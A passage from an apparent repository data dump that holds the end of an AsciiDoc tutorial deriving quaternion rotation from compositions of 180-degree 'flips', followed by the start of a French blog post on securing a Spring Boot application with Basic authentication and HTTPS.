stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flip, which is easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down to flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion term \n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternion to represent flip. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternion. Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)] then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_1} + w_2\\vec{v_2} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternion, so even I\u2019m using vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interesting to know how this is derived, quaternion https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straight forward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)] then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will be only using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be thinking why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign coming from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], then stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nIt shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}], rotate stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotate stem:[270^{\\circ}] degree but in the opposite direction along the same axis stem:[\\vec{v}]. \n\nThe fact that stem:[q] and stem:[\u2013q] represents the same rotation is usually called double-cover. However in our calculation I don\u2019t want you to simply think stem:[q] and stem:[\u2013q] are the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flip along stem:[\\vec{a}] first and then stem:[\\vec{b}]. Actually all unit quaternion multiplication needs to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can however get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and vector stem:[\\vec{v}], we are ready to calculate the result of the flip stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to flip definition, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axis of flip stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)]. From our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the result rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the result rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}].If you are not sure what\u2019s going on here, go back \u201cFlip Composition\u201d and read the proof)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called identity quaternion, means no rotation at all. You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternion, the idea of inversed quaternion is if you apply a rotation, then apply its inverse, the result should be no rotation at all. And it is the same if you apply an inversed rotation then apply the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of flip. You can try extend this proof to general unit quaternion. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can go back to previous result of flipping vector stem:[{q_v'}{q_a}={q_a}{q_v}]. Apply inverse flip of q_a on both side, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us a way to calculate the result of flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is how the \u201csandwich\u201d multiplication form comes from, but only in the form of flip. We will prove that our result holds the same for any rotation in the next section.\n\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we need to prove\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we fully explained how to rotate a vector using quaternion.\n\n=== Rotation Composition\n\nGiven rotation stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate vector stem:[\\vec{v}] by stem:[q_1] first then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nIt is the same as apply the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later. This equation is actually very easy to understand in geometric term. We have a combined rotation stem:[q={q_2}{q_1}] that rotates stem:[q_1] first then rotates stem:[q_2]. If we want to undo this rotation, which means apply the inverse stem:[q^{-1}={q_2}{q_1^{-1}}], we need to undo stem:[q_2] first then undo stem:[q_1], that is effectively stem:[q_1^{-1}q_2^{-1}].\n\nWhat does it really mean to combine 2 rotations, can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually do that.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})], we need to choose a special flip break down, such that they share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a break down? Remember the rule of flip composition requires the flip axis to be perpendicular to the rotation axis, that is stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_2}=0], we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find out the other two axes: rotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] results in stem:[\\vec{a}]; rotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] results in stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our break down stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove this\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nIt shows that the combined rotation can be composed by flip stem:[q_a] and stem:[q_b], which tells the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, Blue plane is based on stem:[\\vec{v_1}] and stem:[\\vec{v_1}], stem:[\\vec{c}] is perpendicular to that plane. \nOrange plane is based on stem:[\\vec{a}] and stem:[\\vec{b}], the result rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of quaternion stem:[q=(x,y,z,w)], the vector form of quaternion stem:[q=(\\vec{v},w)], unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] and how it is used to represent a rotation.\n\nWe also talked about negation of quaternion stem:[\u2013q], and its double cover property; the inverse of quaternion stem:[q^{-1}] and identity quaternion stem:[I=(\\vec{0},1)].\n\nWe use quaternion to represent flip stem:[q_a=(\\vec{a},0)], and derive the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotation gets composed by stem:[q={q_2}{q_1}].\n\nWe slightly touched quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not very important for understanding quaternion. It is a bit calculation heavy and is more for fun. Feel free to skip.\n\nWe can actually derive the general quaternion multiplication from this special flip break down. That is if we define flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can proof what general quaternion multiplication stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})] would look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we choose the flip break down stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nAnd we will have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2})\\\\\n&- sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&=cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2})\n\\end{align*}\n++++ \nFrom the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is \n[stem]\n++++\n\\begin{align*}\nq&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=(cos\\frac{\u03b8_1}{2}(sin\\frac{\u03b8_2}{2}\\vec{v_2}) + cos\\frac{\u03b8_2}{2}(sin\\frac{\u03b8_1}{2}\\vec{v_1}) - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00d7(sin\\frac{\u03b8_2}{2}\\vec{v_2}), cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00b7(sin\\frac{\u03b8_2}{2}vec{v_2}))\n\\end{align*}\n++++ \nwhich is the definition of quaternion multiplication of stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})].\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"35b3a90e6822583bafd4e08e96f5933dcb1640e4","subject":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","message":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","new_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","new_contents":"= 10 raisons de se mettre \u00e0 Spring Boot (2\u00e8me partie) - BACK\n:hp-tags: Spring Boot, MongoDB, Cloud Foundry\n\n====\nLa premi\u00e8re partie de cet article est disponible http:\/\/blog.ellixo.com\/2015\/06\/08\/10-raisons-de-se-mettre-a-Spring-Boot-1ere-partie.html[ici]\n====\n\n6 - La s\u00e9curit\u00e9 pour les nuls\n=============================\n\nLa mise en oeuvre de m\u00e9canisme de s\u00e9curit\u00e9 est primordial ; pour autant, il s'agit toujours d'une \u00e9tape fastidieuse que l'on a tendance \u00e0 repousser. Spring Boot (encore une fois) nous simplifie la t\u00e2che. \n\nPrenons la mise en oeuvre d'une politique de s\u00e9curit\u00e9 simple et classique mais relativement performante : Authentication Basic + HTTPS.\n\n- 1\u00e8re \u00e9tape : HTTP Basic authentication\n\nCe mode d'authentification n\u00e9cessite de fournir lors de l'appel d'une URL un nom d'utilisateur accompagn\u00e9 de son mot de passe. Dans Spring Boot, pour mettre en oeuvre ce m\u00e9canisme, il suffit de :\n\n[circle]\n* ajouter la d\u00e9pendance _org.springframework.boot.spring-boot-starter-security_ au fichier POM\n* ajouter la propri\u00e9t\u00e9 security.user.password sp\u00e9cifiant le mot de passe de l'utilisateur par d\u00e9faut (ie. _user_)\n\nD\u00e8s lors, tout appel aux URL de l'application n\u00e9cessite une authentification :\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:9292\/api\n{\"timestamp\":1432745548802,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Full authentication is required to access this resource\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:bad_password@localhost:9292\/api\n{\"timestamp\":1432745622513,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Bad credentials\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432745645639\"}\n----\n\n* 2\u00e8me \u00e9tape : HTTPS\n\nL'authentification _Basic_ poss\u00e8de un d\u00e9faut majeur : elle n\u00e9cessite de faire transiter le mot de passe en clair. Pallions cela en cryptant les communications via HTTPS. Encore une fois, Spring Boot a tout pr\u00e9vu :\n\n[circle]\n* Ajout d'un repository de certificats (ie. fichier https:\/\/docs.oracle.com\/cd\/E19509-01\/820-3503\/ggfen\/index.html[.jks]) dans l'arborescence de l'application\n* Configuration des propri\u00e9t\u00e9s du repository\n\n[source,yaml]\n----\nserver:\n port: 9292\n ssl:\n key-store: classpath:keystore.jks\n key-store-password: password\n key-password: password\nsecurity:\n user:\n password: password\n----\n\nHTTPS est maintenant disponible ; voil\u00e0 votre application s\u00e9curis\u00e9e en 5 minutes.\n\n7 - La bo\u00eete \u00e0 outils du parfait petit int\u00e9grateur\n==================================================\n\nLes d\u00e9mos ou tutoriaux que vous pourrez trouver sur le web fournissent la plupart du temps une API REST simple (cf. point 1). Bien s\u00fbr, Spring Boot va beaucoup plus loin en fournissant de nombreux connecteurs :\n\n* Bases relationnelles : JDBC, JPA, JdbcTemplate\n* Bases NoSQL : Redis, MongoDB, ElasticSearch ...\n* Messaging : JMS\n\nIl est bien s\u00fbr possible d'int\u00e9grer n'importe quelle librairie externe mais les connecteurs \"Spring Boot\" simplifieront la mise en oeuvre et la configuration des syst\u00e8mes au sein de l'application.\n\nNous allons faire \u00e9voluer notre application pour stocker les logs dans une base MongoDB.\n\n. Pour \u00e9viter d'installer MongoDB et simplifier les tests de l'application, nous allons utiliser une instance embarqu\u00e9e \u00e0 l'aide de la librairie https:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Mongo Embed Flapdoodle] (remarque : nous associons cette base embarqu\u00e9e au profil \"test\" pour \u00e9viter son ex\u00e9cution sur un autre profil, production par exemple) 